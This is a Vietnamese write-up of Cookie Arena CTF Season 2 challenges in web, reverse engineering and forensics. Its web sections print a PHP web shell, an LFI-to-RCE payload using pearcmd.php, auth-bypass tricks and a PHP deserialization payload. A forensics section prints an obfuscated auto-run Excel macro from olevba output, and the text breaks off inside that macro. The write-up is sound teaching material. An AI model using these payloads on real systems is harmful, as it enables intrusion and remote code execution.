Cookie Arena CTF Season 2 Writeup

{%hackmd @themes/orangeheart %} ![](https://hackmd.io/_uploads/rJJpnHtKh.png) # Web ## Be Posititve Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/be-positive Thay vì chuyển tiền thông thường thì sẽ chuyển số âm ![](https://hackmd.io/_uploads/H1YvcztYh.png) ![](https://hackmd.io/_uploads/r1S_czKYh.png) ## Slow Down Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/slow-down Transfer với `amount=111111111+1` ![](https://hackmd.io/_uploads/SkgqW2zKKh.png) ![](https://hackmd.io/_uploads/ByWN2fKK2.png) ## Youtube Downloader Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/youtube-downloader ![](https://hackmd.io/_uploads/SkXYoztFh.png) ![](https://hackmd.io/_uploads/rJHqiGFYn.png) ## Passcode Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/pass-code Deobfuscate đoạn js sau ![](https://hackmd.io/_uploads/ByfvnzKK2.png) Dùng tool này https://deobfuscate.relative.im/ để deobfucate thì thấy được key ![](https://hackmd.io/_uploads/HyHFnGtK3.png) ![](https://hackmd.io/_uploads/rJDjnzFK2.png) ## Magic Login Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/magic-login Đăng nhập với username bất kỳ, pass là một trong các chuỗi tạo được magic hash trong [link này ](https://github.com/spaze/hashes/blob/master/sha256.md) ![](https://hackmd.io/_uploads/H19VTfFY2.png) Upload con shell với nội dung ```php <?php echo system($_GET['cmd']);?> ``` ![](https://hackmd.io/_uploads/H1XqTzYK2.png) ## Magic Login Harder Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/magic-login-harder Tham khảo link sau để tạo 2 mã base64 khác nhau nhưng có cùng hash md5 https://stackoverflow.com/questions/1756004/can-two-different-strings-generate-the-same-md5-hash-code#:~:text=the+paper ``` $ echo '0e306561559aa787d00bc6f70bbdfe3404cf03659e704f8534c00ffb659c4c8740cc942feb2da115a3f4155cbb8607497386656d7d1f34a42059d78f5a8dd1ef' | xxd -r -p | base64 -> DjBlYVWap4fQC8b3C73+NATPA2WecE+FNMAP+2WcTIdAzJQv6y2hFaP0FVy7hgdJc4ZlbX0fNKQg WdePWo3R7w== $ echo '0e306561559aa787d00bc6f70bbdfe3404cf03659e744f8534c00ffb659c4c8740cc942feb2da115a3f415dcbb8607497386656d7d1f34a42059d78f5a8dd1ef' | xxd -r -p | base64 -> DjBlYVWap4fQC8b3C73+NATPA2WedE+FNMAP+2WcTIdAzJQv6y2hFaP0Fdy7hgdJc4ZlbX0fNKQg WdePWo3R7w== ``` ![](https://hackmd.io/_uploads/B1kwRMKF3.png) Tại `admin.php` có thể LFI thông qua param `file` ![](https://hackmd.io/_uploads/S1PsCMFtn.png) Dùng payload sau để tạo shell vào `/tmp/..` ``` file=/usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET['cmd']);?>+/tmp/shell.php ``` Tuy nhiên ký tự đặc biệt bị encode nên phải base64 đoạn code php ``` file=/usr/local/lib/php/pearcmd.php&+config-create+/PD89c3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4+/tmp/shell.php ``` ![](https://hackmd.io/_uploads/SkvwkmFYn.png) Khi LFI để include `/tmp/shell..php` thì dùng thêm wrapper `convert.base64-decode` ![](https://hackmd.io/_uploads/HJssJQFY3.png) ![](https://hackmd.io/_uploads/r1A6J7Kth.png) ## Suck it Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/suck-it Đọc source code ta thấy có đoạn ![](https://hackmd.io/_uploads/ryAVl7Kth.png) Khi gọi `force disconnect` nó sẽ trả về `sessionID` của `userID` thông qua dòng code `socket.emit(targetSocket.sessionID)` (key thì được hard code rồi) Ta đã biết được`usserID` của admin là `ADMIN` ![](https://hackmd.io/_uploads/rJ-jgQtth.png) Gọi đến `force disconnect` để lấy session của admin ![](https://hackmd.io/_uploads/rk-eZmFFh.png) Thay session này vào localStorage và chat với người yêu admin ![](https://hackmd.io/_uploads/By9f-QKFh.png) ## Video Link Extractor Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/video-link-extractor Nếu extract mà host là `localhost` thì code sẽ xử lý như sau ![](https://hackmd.io/_uploads/rktjZQYYn.png) Lợi dụng để gọi đến `redirect` của `index.php` ![](https://hackmd.io/_uploads/BJSTZmFt2.png) ![](https://hackmd.io/_uploads/HJ89zQFYn.png) ![](https://hackmd.io/_uploads/SJo9fXKYn.png) Untrusted data sẽ là response ta trả về, khi đó nó được unserialize ![](https://hackmd.io/_uploads/Byjpz7tK2.png) Thêm vào đó object `Utils` khi `__wakeup` sẽ gọi `$this->_file` ![](https://hackmd.io/_uploads/BJWx77Yt2.png) Script tạo serialize data: ```php <?php class Utils { public $_file = "php://filter/convert.base64-encode/resource=flag.php"; }; echo(serialize(new Utils())); ?> ``` Thay kết quả của script vào response của webhook ![](https://hackmd.io/_uploads/HkuR4mYK3.png) ![](https://hackmd.io/_uploads/Sk3TNQYYn.png) ![](https://hackmd.io/_uploads/S1cJHXFKn.png) # Rev ## Pyreverse Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/pyrevese Dùng `pyinstxtractor` để tạo ra folder chứa file `.pyc` Dùng Uncompyle6 hoặc [Decompiler Tools](https://www.decompiler.com/) để decomplie file `pyreverse.pyc` Kết quả: ```python import base64 def reverse_string(s): return s[::-1] def scramble_flag(flag): scrambled = '' for i, char in enumerate(flag): if i % 2 == 0: scrambled += chr(ord(char) + 1) continue scrambled += chr(ord(char) - 1) return scrambled def main(): secret_flag = scramble_flag(reverse_string(base64.b64decode('Q0hIe3B5dGhvbjJFeGlfUmV2ZXJzZV9FTmdpbmVyaW5nfQ==')).decode()) print('Welcome to PyReverser!') print('Please enter a word or phrase:') user_input = input() generated_value = scramble_flag(reverse_string(user_input.upper())) print('Generated value:', generated_value) print('Can you find the hidden flag?') reversed_flag = reverse_string(secret_flag) print('Reversed flag:', reversed_flag) if __name__ == '__main__': main() return None ``` ![](https://hackmd.io/_uploads/HkQVJbYYn.png) ## Jump Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/jump Jump đến địa chỉ `401500` ![](https://hackmd.io/_uploads/SJTBReYF2.png) `4199680` tương đương `0x401500` trong hexa ![](https://hackmd.io/_uploads/SkV5RxYYh.png) ## Rev1 Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/rev1 Hàm xử lý input để get flag ![](https://hackmd.io/_uploads/HyA8yWYYn.png) ![](https://hackmd.io/_uploads/BJbOk-tF2.png) Dùng script để giải hệ phương trình 14 ẩn: ```python from z3 import * solver = Solver() v = [BitVec(f'x{i}', 32) for i in range(14)] equations = [ 0x6E * v[0] + 0x1C3 * v[1] + 0x348 * v[2] + 0x1F8 * v[3] - 0x357 * v[4] + 0x46 * v[5] - 0x16F * v[6] - 0x2FE * v[7] + 0x17A * v[8] + 0x15A * v[9] - 0x326 * v[10] - 0x190 * v[11] + 0x129 * v[12] + 0x2ED * v[13] == 0x29CB, 0x2A * v[0] + 0x3B2 * v[1] + 0x2C1 * v[2] + 0x23A * v[3] - 0x3D1 * v[4] + 0x152 * v[5] + 0x221 * v[6] - 0x2FC * v[7] - 0x0DF * v[8] - 0x36F * v[9] + 0x1A2 * v[10] + 0x179 * v[11] + 0x284 * v[12] - 0x64 * v[13] == 0x0F0ED, 0x328 * v[0] + 0x3CD * v[1] + 0x3CC * v[2] + 0x329 * v[3] + 0x0EA * v[4] - 0x1A * v[5] + 0x12B * v[6] - 0x2E * v[7] - 0x337 * v[8] + 0x262 * v[9] + 0x37 * v[10] - 0x0A4 * v[11] + 0x383 * v[12] + 0x2D5 * v[13] == 0x66098, 0x66 * v[0] - 0x3C9 * v[1] - 0x0C0 * v[2] - 0x0BD * v[3] - 0x9D * v[4] + 0x2D1 * v[5] - 0x299 * v[6] + 0x38E * v[7] + 0x15 * v[8] - 0x14E * v[9] + 0x280 * v[10] + 0x0E1 * v[11] - 0x128 * v[12] + 0x50 * v[13] == 0x6CE4, 0x2ED * v[0] + 0x8A * v[1] - 0x155 * v[2] - 0x8C * v[3] - 0x239 * v[4] + 0x259 * v[5] - 0x286 * v[6] - 0x1DA * v[7] + 0x154 * v[8] - 0x196 * v[9] + 0x97 * v[10] + 0x26D * v[11] + 0x3E0 * v[12] - 0x1EB * v[13] == 0x150DD, 0x46 * v[0] - 0x2DF * v[1] + 0x243 * v[2] + 0x78 * v[3] - 0x0EE * v[4] + 0x99 * v[5] - 0x0C5 * v[6] - 0x0EB * v[7] - 0x0AE * v[8] + 0x28F * v[9] - 0x65 * v[10] + 0x20B * v[11] - 0x147 * v[12] + 0x3C2 * v[13] == 0x1E68B, 0x264 * v[0] + 0x2BE * v[1] + 0x3B5 * v[2] - 0x1D3 * v[3] - 0x8 * v[4] - 0x150 * v[5] + 0x3C1 * v[6] - 0x3E4 * v[7] - 0x58 * v[8] - 0x19C * v[9] + 0x3AA * v[10] + 0x261 * v[11] - 0x17F * v[12] - 0x167 * v[13] == 0x18490, 0x0B3 * v[0] - 0x63 * v[1] - 0x0E0 * v[2] + 0x24 * v[3] + 0x37C * v[4] + 0x0AA * v[5] + 0x33 * v[6] - 0x11E * v[7] - 0x13D * v[8] + 0x139 * v[9] + 0x3DC * v[10] - 0x14C * v[11] + 0x2DD * v[12] + 0x2B3 * v[13] == 0x3CC54, 0x102 * v[0] + 0x115 * v[1] + 0x0D3 * v[2] + 0x0DC * v[3] + 0x3A1 * v[4] - 0x35C * v[5] - 0x0ED * v[6] + 0x141 * v[7] - 0x19C * v[8] - 0x2B6 * v[9] + 0x3CC * v[10] + 0x3AA * v[11] + 0x24B * v[12] + 0x1B9 * v[13] == 0x45670, 0x3C4 * v[0] + 0x305 * v[1] - 0x0A9 * v[2] + 0x87 * v[3] - 0x0E6 * v[4] + 0x30 * v[5] + 0x20F * v[6] - 0x3D0 * v[7] - 0x94 * v[8] - 0x2CC * v[9] + 0x56 * v[10] + 0x224 * v[11] + 0x1B5 * v[12] + 0x183 * v[13] == 0x21A0F, 0x256 * v[0] + 0x157 * v[1] + 0x181 * v[2] - 0x306 * v[3] - 0x243 * v[4] - 0x9 * v[5] - 0x373 * v[6] - 0x1A3 * v[7] + 0x223 * v[8] + 0x200 * v[9] - 0x365 * v[10] - 0x56 * v[11] + 0x1B6 * v[12] - 0x39C * v[13] == 0x0FFFE3896, 0x0A3 * v[0] + 0x2B2 * v[1] + 0x22D * v[2] + 0x3D6 * v[3] - 0x9A * v[4] - 0x76 * v[5] - 0x2A0 * v[6] + 0x63 * v[7] + 0x373 * v[8] + 0x15 * v[9] - 0x3B9 * v[10] + 0x214 * v[11] - 0x232 * v[12] + 0x225 * v[13] == 0x22874, 0x151 * v[0] + 0x153 * v[1] + 0x25F * v[2] - 0x187 * v[3] - 0x2AC * v[4] + 0x1CC * v[5] - 0x155 * v[6] - 0x2F5 * v[7] - 0x22D * v[8] + 0x17B * v[9] - 0x377 * v[10] - 0x0B2 * v[11] - 0x294 * v[12] - 0x2CE * v[13] == 0x0FFFBEC4D, 0x2AA * v[0] + 0x95 * v[1] + 0x83 * v[2] + 0x25B * v[3] - 0x77 * v[4] - 0x2E1 * v[5] + 0x39D * v[6] + 0x251 * v[7] + 0x0A2 * v[8] - 0x27D * v[9] + 0x268 * v[10] + 0x2F9 * v[11] + 0x14 * v[12] - 0x115 * v[13] == 0x3C5E6 ] for equation in equations: solver.add(equation) if solver.check() == sat: model = solver.model() solution = [model.evaluate(i).as_long() for i in v] print(f'{solution}') else: print("no solution") flag = "" for i in solution: flag += chr(i) print(flag) ``` ![](https://hackmd.io/_uploads/r1Q61WtY2.png) ![](https://hackmd.io/_uploads/r1oRkWKY3.png) # For ## Tin học văn phòng Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/tin-hoc-van-phong-co-ban ``` olevba Challenge.doc ``` ![](https://hackmd.io/_uploads/BJdOebFth.png) ## Sổ đăng ký Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/so-dang-ky Xem bằng `Registry View` ![](https://hackmd.io/_uploads/SJRJ-WKKn.png) Ta được đoạn base64 `TVFva4JAGP8qh7hxx/IwzbaSBZtsKwiLGexFhJg+pMs09AmL6rvP03S9uoe739/nZD+OIEHySmwolNn6F3wkzilH2HEbkDupvwXM+cKaWxWSSt2Bxrv9F64ZOteepU5vYOjMlHPMwNuVQnItyb8AneqOMnO5PiEsVytZnHkJUjnvG4ZuXB7O6tUswigGSuVI0Gsh/g1eQGt8h6gdUo98CskGQ8aIkgBR2dmUAw+9kkfvCiiL0x5sbwdNlQUckb851mTykfhpECUbdstXjo2LMIlEE0iCtedvhWgER1I7aKPHLrmQ2QGVmkbuoFoVvOE9Eckaj8+26vbcTeomqptjL3OLUM/0q1Q+030RMD73MBTYEZFuSmUMYbpEERduSVfDYZW8SvwuktJ/33bx/CeLEGirU7Zp52ZpLfYzPuQhZVez+SsrTnOg7A8=` Decode bằng [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)) ![](https://hackmd.io/_uploads/ByYAWWtt3.png) ## Báo cáo dang dở Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/bao-cao-dang-do ![](https://hackmd.io/_uploads/HJalQZYK2.png) Phát hiện có file này ![](https://hackmd.io/_uploads/rkWX7Wttn.png) Dumpfile ![](https://hackmd.io/_uploads/BkRU7ZKKh.png) Binwalk ![](https://hackmd.io/_uploads/SJi6QZYFh.png) Extract được folder như thế này ![](https://hackmd.io/_uploads/rJJkEbKK3.png) Flag nằm ở `/word/media/image2.png` ![](https://hackmd.io/_uploads/HJdxNWFYn.png) ## TrivalFTP Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/trivial-ftp Tại udp stream 26, ta thấy data có chứa header của 1 file PDF Đọc các packet của nó và suy ra được data mà ta cần extract ở `udp.dstport == 58813` Vì bài này giao thức TFTP sử dụng netacsii mode mà mode này khác ASCII thông thường ở chổ ``` netacsii: 0D0A tương đương 0A trong ASCII netacsii: 0D00 tương đương 0D trong ASCII ``` Nên ta cần replace `0D0A` và `0D00` về đúng định dạng Script ```python from pyshark import FileCapture from binascii import unhexlify packets = FileCapture( "TrivialFTP.pcapng", use_json=True, decode_as={"udp.port==51397": "tftp"} ) result = '' for pkt in packets: if hasattr(pkt, 'tftp'): if hasattr(pkt, 'data'): result += pkt.data.data print(result) result = unhexlify(result.replace(':', '')) print(result) result = result.replace(b'\x0d\x0a', b'\x0a') result = result.replace(b'\x0d\x00', b'\x0d') with open('data.pdf', 'wb') as f: f.write(result) ``` ![](https://hackmd.io/_uploads/SkE3NbKt2.png) ## Under Control Link: https://battle.cookiearena.org/arenas/cookie-arena-ctf-season-2/battle/under-control Có 1 file Microsoft Excel đáng nghi ngờ ![](https://hackmd.io/_uploads/Hkn25VYth.png) Dùng oletool và olevba ```bash $olevba Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi$1$.xls olevba 0.60.1 on Python 3.10.6 - http://decalage.info/python/oletools =============================================================================== FILE: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls Type: OLE ------------------------------------------------------------------------------- VBA MACRO ThisWorkbook.cls in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) VBA MACRO Sheet1.cls in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - (empty macro) ------------------------------------------------------------------------------- VBA MACRO Module1.vba in file: Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi(1).xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub Auto_Open() Workbook_Open End Sub Sub AutoOpen() Workbook_Open End Sub Sub WorkbookOpen() Workbook_Open End Sub Sub Document_Open() Workbook_Open End Sub Sub DocumentOpen() Workbook_Open End Sub Function ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»· = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" »¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢ = "ãXL1lYU~Ùä,Ca²ZfÃ@dO-cq³áÕsÄJV9AQnvbj0Å7WI!RBg§Ho?K_F3.Óp¥ÖePâzk¶ÛNØ%G mÜ^M&+¡#4)uÀrt8(ÒSw|T*Â$EåyhiÚx65Dà¿2ÁÔ" For y = 1 To Len(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨) ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© = InStr(¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·, Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1)) If ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯© > 0 Then ¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« = Mid(»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢, ¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©, 1) ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + ¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®« Else ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» + Mid(µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨, y, 1) End If Next ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨ = ¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£» For ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° = 1 To Len(®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦²) ®¶®¾ª¼¿¢·¥»°¾£º¤¿º·¡¦ª¹¹¾´°¢²¶©»°´¢«°µ¸¶¥¤·«½¿¢´¹º¡º»º¸®µ»³¸µ»¦¦½¨¾¾¨¦² = ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° Next For ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» = 2 To Len(£©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦) £©©³¶º©«®®·º¿¿°µ·¡º·«½ª¾¢¢µ¥¹¾²ª¤°¥©½®¥³µ¯¶¹¹´·¹³½²µ£²·¬·¿³¤¹´¨¢º§¯²¦ = 2 Next For »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· = 3 To Len(»¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸) »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ = »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· Next For ¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ = 4 To Len(´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤·) ´³®½£¼µ·©¡¤¨®º²§¿»²¹£°»¦¾¹²²³¡¨«¯°»³¸¢»¹²£»´£¬¦º¸¸³¾½¨¡º¥¬¥«¹·§¶¶°¦«¹¥¤· = 2 Next End Function Sub Workbook_Open() Dim ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ As Object Dim ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ As String Dim ¤¸¿º«¡¬¡°µ²¢¹¾¿¡¼²¥¾®¨¶µ»¾«º½¼»ª²¢¾ª¤»¹¬»¾»¸¤µµ°¡§¬¿§¢¥§¥£¶¢¥©¨ As String Dim §»¶¬¡¦¹³¾¸¸³££¹´´¸³¥¦´¢¹¥··£°¿²»º¶°°¥©²¢°¾ª«°©«®·½½··´®¹°µµ©½½§¥·°»¢¼¼´¡¦¡«¹ As String Dim ¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ As Integer ¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦¤¢§¸®¼³¨¦¶¨¥³°©¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ = Chr(50) + Chr(48) + Chr(48) Set ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§ = CreateObject("WScript.Shell") ¦¡º¾¿°®¹½º°¡£¿¡¢³´º¥¦²¤°°·¥®½½¡¶«¥¸¹«©·¬°·®¶£³¬§§¹°«µ©¹¢´¥ª¾¾¸»¹©§²·°¢ª¸¢£¡ = ¹·³«»½¦¨¬¢¸°¤¼¾£¬»¢¾´¢¢µ¾¡¥»»«·¸»µ´¾¼¶»²¥§©¥¥¾¿¼¿²µ°¤²£¹´¶§.SpecialFolders("AppData") Dim ¥·µ¬¹¿¬¯¨³³¿¯©¶¦»ª¹½¦¢¨»¸¸¸º²£²«µ¤¶¸¹µ«¶§¾¼µ®»¶¾ªºº³¦º§°¹¢¸¡³®»¹¶¯¾£º¦£¥²´¼¦¥²·´©¡»¨´°¦¼ Dim ´¼¦¥²·´©¡»¨´°¦¼®¬®«»·»¢¶¶¿®«¾¢·³§½¿¤½¿§¡¼«¼´ª³²¬¸®º¼¤¼¬¿¥§·«´¡¤´½¨µ£³¯½°²ª²µº´©¤£¤¡½¯ª¸¯¿¦ Dim ¢¾¾¡µ¼£¹£»©¶©£¦µ¥¹¢µ¹·½§²¶·¼¥¨º»¡´¾«½²¢¢£°¨¤°º¥¦´¢¡¥¹¤¾½³¥¸²¤µ»°°§§¹¾©·¬·ª°¸°¡¥·µ¬¹¿¬¯¨³³¿¯©¶ Dim ³§½¢º¹¸°¾»´¦§¢·¬»´¦³²¦¦·°¶¥°¯¾µ·§½µº¦¶»¹²¥¦¥·²¢¥³°§°¹¾¾£½©¼°¥«ª§¡¹¶° As Long Dim ¥½µ©¡»¡·¤¼¶µ¢¾·½¼¾®¦»»¼¬§ª¦·°¹·³¹¸¤µ³³¡¢£§´¤´¹¨´¡¾¦¬°¹¦¼¥°¡³» As String Dim ¿¨¡©§¾¡º·¼½µ¡®¾¥¼½«¹´¥¥¶²°»¤¡·»°¬£°¿¥§¬¸©º¢¾¥·´£¹¥¡½¬¸ª´º°»§¬¥¡£¢¦»·¶ As Long Dim »¶ª¨½©ª¾»¼§µ¨®º¾¢°¦»»¬¥§»¡¬·»¥¾¥¤½°·¾¢²³¡¹¾³¢µ¾·¹«¬¸¼´³£¥°µ»«½°®¸ As String Dim »´¦¾¨¶¶½»¿º©³¬µ³°¶¢µ¼²¢°·¸¤¾¨»£¼¡»¥¹¼¤·©©³¹§¾¸¢·¤·¼ºµ£· As Long Dim ¹®µ´¾¥»³ºª´¡¹®¶¶®¦·³«¢¢¢¹µ¹½¸¦§¥§·°°¡µ¼¤¿©¦¸£¥¥¹¦¶¨¹«©§µ¡´²·°º¢·¡¸²µ¤°²³¯£«¶£ As String Dim 